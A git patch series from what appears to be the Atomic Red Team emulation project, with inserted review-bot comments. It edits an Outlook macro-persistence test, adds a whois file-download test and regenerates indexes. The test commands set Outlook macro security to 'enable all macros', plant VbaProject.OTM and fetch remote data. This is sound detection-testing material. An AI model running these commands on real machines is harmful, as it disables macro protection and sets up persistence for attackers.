atomics/T1137/T1137.yaml | 4 ++-- 2 files changed, 17 insertions(+), 8 deletions(-) diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index a7660ba0..2a8fa0fc 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137)
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. -A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, macros and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) ## Atomic Tests @@ -12,11 +12,20 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 + As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ -it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. -Too achieve this two things must happened on the syste +it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands in the user context. This transform Outlook into a C2 execution method. +To achieve this two things must happen on the system: - The macro security registry value must be set to '4' -- A file called VbaProject.OTM must be created in the Outlook Folder. +- A correctly formatted file called VbaProject.OTM must be created in the Outlook Folder. + +Note: There are a variety of options possible for the Macro security setting. These are: +``` +4 = Disable all macros without notification +3 = Notifications for digitally signed macros, all other macros disabled +2 = Notifications for all macros +1 = Enable all Macros +``` **Supported Platforms:** Windows @@ -28,14 +37,14 @@ Too achieve this two things must happened on the syste ```cmd -reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` #### Cleanup Commands: ```cmd -reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml index 138d40bc..238f7a5b 100644 --- a/atomics/T1137/T1137.yaml +++ b/atomics/T1137/T1137.yaml 
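Review bot: The retained line `- The macro security registry value must be set to '4'` now contradicts the attack command in the following hunk, which writes `/d 1`; the sentence should read `- The macro security registry value must be set to '1'` so the description matches what the test actually does. T1137.md is produced by the doc generator from T1137.yaml, and the generated-docs commit that follows on this page drops these hand edits (including the "macros" word added to the ATT&CK description in the earlier hunk), so the explanatory text and the value table belong in the `description:` field of T1137.yaml, whose hunk in this series changes only the commands. The enclosing section continues outside the hunk.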
@@ -13,10 +13,10 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM name: command_prompt From c7125ac30715087aadf46545f9d5bd377402fbe8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 04:39:47 +0000 Subject: [PATCH 44/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1137/T1137.md | 17 ++++------------- 2 files changed, 6 insertions(+), 15 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e4882d57..9d315073 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -42012,11 +42012,11 @@ persistence: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM name: command_prompt T1137.001: diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 2a8fa0fc..50c9c974 100644 --- a/atomics/T1137/T1137.md 
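Review bot: The new `reg add` still omits `/v`, so `Security\Level` is created as a subkey (with `/d 1` applied to its default value) rather than the `Level` REG_DWORD value under the `Security` key that Outlook reads for its macro security setting, and the test will not change macro security; the same command appears in the T1137.md hunk above and in the regenerated index.yaml. The commands should be `reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /t REG_DWORD /d 1 /f` and, for cleanup, `reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /f`. Cleanup also deletes the value instead of restoring the previous setting, so on a profile that already had an explicit `Level` the test leaves Outlook on its built-in default; capturing the old value before the change would make the test safer to run on a real user profile. The surrounding atomic test definition starts outside the hunk.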
+++ b/atomics/T1137/T1137.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137)
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. -A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, macros and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) ## Atomic Tests @@ -12,20 +12,11 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 - As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ -it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands in the user context. This transform Outlook into a C2 execution method. -To achieve this two things must happen on the system: +it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. +Too achieve this two things must happened on the syste - The macro security registry value must be set to '4' -- A correctly formatted file called VbaProject.OTM must be created in the Outlook Folder. - -Note: There are a variety of options possible for the Macro security setting. These are: -``` -4 = Disable all macros without notification -3 = Notifications for digitally signed macros, all other macros disabled -2 = Notifications for all macros -1 = Enable all Macros -``` +- A file called VbaProject.OTM must be created in the Outlook Folder. **Supported Platforms:** Windows From 78bb39a82d7efc26887bc72eb26677b66fb87077 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 16 Jun 2021 15:08:05 +0000 Subject: [PATCH 45/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1105/T1105.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 36360c6d..c90158a6 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -336,6 +336,7 @@ atomic_tests: del %temp%\MpCmdRun.log >nul 2>&1 name: command_prompt - name: whois file download + auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: | Download a remote file using the whois utility diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 03f6048b..ba1c4cac 100644 --- a/atomics/used_guids.txt 
+++ b/atomics/used_guids.txt @@ -720,3 +720,4 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 d546a3d9-0be5-40c7-ad82-5a7d79e1b66b 812c3ab8-94b0-4698-a9bf-9420af23ce24 afedc8c4-038c-4d82-b3e5-623a95f8a612 +c99a829f-0bb8-4187-b2c6-d47d1df74cab From 1219378ebd1351f809bac9e07e420c9c6e53ff01 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 15:08:12 +0000 Subject: [PATCH 46/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/linux-index.md | 1 + .../Indexes/Indexes-Markdown/macos-index.md | 1 + atomics/Indexes/index.yaml | 49 ++++++++++++++++++ atomics/T1105/T1105.md | 51 +++++++++++++++++++ 8 files changed, 106 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index a2bca221..b3f87204 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -848,6 +848,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt +command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index e3764d6d..0e0f2184 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -180,6 +180,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash +command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 335e60cf..b0eec59f 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv 
@@ -159,6 +159,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash +command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index da7cfd0c..c79dc4ab 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1547,6 +1547,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #14: whois file download [linux, macos] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index bbbb7484..957af315 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -609,6 +609,7 @@ - Atomic Test #4: scp remote file copy (pull) [linux, macos] - Atomic Test #5: sftp remote file copy (push) [linux, macos] - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #14: whois file download [linux, macos] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 9253adec..90552709 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -456,6 +456,7 @@ - Atomic Test #4: scp remote file copy (pull) [linux, macos] - Atomic Test #5: sftp remote file copy (push) [linux, macos] - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #14: whois file download [linux, macos] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9d315073..e4991964 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -64644,6 +64644,55 @@ command-and-control: del #{local_path} >nul 2>&1 del %temp%\MpCmdRun.log >nul 2>&1 name: command_prompt + - name: whois file download + auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab + description: 'Download a remote file using the whois utility + +' + supported_platforms: + - linux + - macos + input_arguments: + remote_host: + description: Remote hostname or IP address + type: String + default: localhost + remote_port: + description: Remote port to connect to + type: Integer + default: 8443 + output_file: + description: Path of file to save output to + type: Path + default: "/tmp/T1105.whois.out" + query: + description: Query to send to remote server + type: String + default: Hello from Atomic Red Team test T1105 + timeout: + description: Timeout period before ending process (seconds) + type: Integer + default: 1 + dependencies: + - description: 'The whois and timeout commands must be present + +' + prereq_command: 'which whois && which timeout + +' + get_prereq_command: 'echo "Please install timeout and the whois package" + +' + executor: + name: sh + elevation_required: false + command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p + #{remote_port} "#{query}" > #{output_file} + +' + cleanup_command: 'rm -f #{output_file} + +' T1090.001: technique: external_references: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index fc154f30..342c71e0 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -30,6 +30,8 @@ - [Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe](#atomic-test-13---download-a-file-with-windows-defender-mpcmdrunexe) +- [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +
@@ -482,4 +484,53 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m +
+
+ +## Atomic Test #14 - whois file download +Download a remote file using the whois utility + +**Supported Platforms:** Linux, macOS + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| remote_host | Remote hostname or IP address | String | localhost| +| remote_port | Remote port to connect to | Integer | 8443| +| output_file | Path of file to save output to | Path | /tmp/T1105.whois.out| +| query | Query to send to remote server | String | Hello from Atomic Red Team test T1105| +| timeout | Timeout period before ending process (seconds) | Integer | 1| + + +#### Attack Commands: Run with `sh`! + + +```sh +timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} +``` + +#### Cleanup Commands: +```sh +rm -f #{output_file} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: The whois and timeout commands must be present +##### Check Prereq Commands: +```sh +which whois && which timeout +``` +##### Get Prereq Commands: +```sh +echo "Please install timeout and the whois package" +``` + + + +
From 7e86e9a7811c25e5b4d694a52660b881f8204376 Mon Sep 17 00:00:00 2001 From: adeliktas <64136642+adeliktas@users.noreply.github.com> Date: Wed, 16 Jun 2021 20:38:40 +0200 Subject: [PATCH 47/84] T1566.001-1 using default Browser via explorer.exe instead of chrome PhishingAttachment.xlsm (#1520) --- atomics/T1566.001/bin/PhishingAttachment.xlsm | Bin 13498 -> 13517 bytes 1 file changed, 0 insertions(+), 0 deletions(-) 
diff --git a/atomics/T1566.001/bin/PhishingAttachment.xlsm b/atomics/T1566.001/bin/PhishingAttachment.xlsm index ee236ea0855333476c65f2773e2e0736faf3673c..9cbfd3f70ca8966176da991072f7e6af6b2d99ff 100644 GIT binary patch delta 9916 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 
